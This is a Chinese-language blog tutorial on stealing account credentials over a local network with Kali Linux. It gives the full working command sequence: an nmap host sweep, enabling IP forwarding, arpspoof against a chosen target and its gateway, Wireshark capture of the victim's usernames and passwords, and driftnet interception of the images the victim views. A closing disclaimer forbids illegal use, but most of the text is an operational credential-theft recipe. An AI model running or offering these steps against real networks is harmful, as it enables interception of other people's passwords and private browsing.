![c49b3ed4d79674c14a24e0d79682a7a9.png](https://img-blog.csdnimg.cn/img_convert/c49b3ed4d79674c14a24e0d79682a7a9.png)
kali内网渗透之盗取用户账号信息(使用的是kali-linux-2020-1a)
一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0
sudo ifconfig
![21252773b56f5802daf308ad97b5efc8.png](https://img-blog.csdnimg.cn/img_convert/21252773b56f5802daf308ad97b5efc8.png)
二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101
nmap -sP 192.168.1.0/24
![77c57a12c31eb3edfc50f987241a3d21.png](https://img-blog.csdnimg.cn/img_convert/77c57a12c31eb3edfc50f987241a3d21.png)
三、利用ARP欺骗让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我。
1、在进行arp欺骗之前,我们要先开启本机的IP转发功能,如果不开启的话,我们攻击之后会使目标机断网,而不是欺骗。
echo 1 > /proc/sys/net/ipv4/ip_forward
![b82f23a05f5b8e48a469a4d1dccbf699.png](https://img-blog.csdnimg.cn/img_convert/b82f23a05f5b8e48a469a4d1dccbf699.png)
2、对目标主机进行欺骗,如果没有arpspoof可以使用sudo apt-get install dsniff 安装
sudo apt-get install dsniff
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
![68616f8d5025d7a90b2ee73872c639b9.png](https://img-blog.csdnimg.cn/img_convert/68616f8d5025d7a90b2ee73872c639b9.png)
四、使用wireshark抓取经过本机eth0网卡的数据包
![2af306e4600c7e43a25ff64a5f400b6f.png](https://img-blog.csdnimg.cn/img_convert/2af306e4600c7e43a25ff64a5f400b6f.png)
![fa279a2afc78944a4d67584efca3f5c2.png](https://img-blog.csdnimg.cn/img_convert/fa279a2afc78944a4d67584efca3f5c2.png)
五、当被攻击主机访问网站输入用户密码可以在wireshark中找到对应的数据包并取得用户名密码
![ac150057bc40c4efb10a6fc30f82702f.png](https://img-blog.csdnimg.cn/img_convert/ac150057bc40c4efb10a6fc30f82702f.png)
![d26a381ddcff69dae3ff10ad0210a3bf.png](https://img-blog.csdnimg.cn/img_convert/d26a381ddcff69dae3ff10ad0210a3bf.png)
六、另外做了内网欺骗后还可以截取到目标主机上浏览的图片,是不是很赞!
driftnet -i eth0
![69ce1abf4f24743415e19980202e1d53.png](https://img-blog.csdnimg.cn/img_convert/69ce1abf4f24743415e19980202e1d53.png)
最后,此文只是向大家展示一下内网渗透的相关过程,任何人不得用于违法犯罪,否则与本人无关,安全上网,人人有责。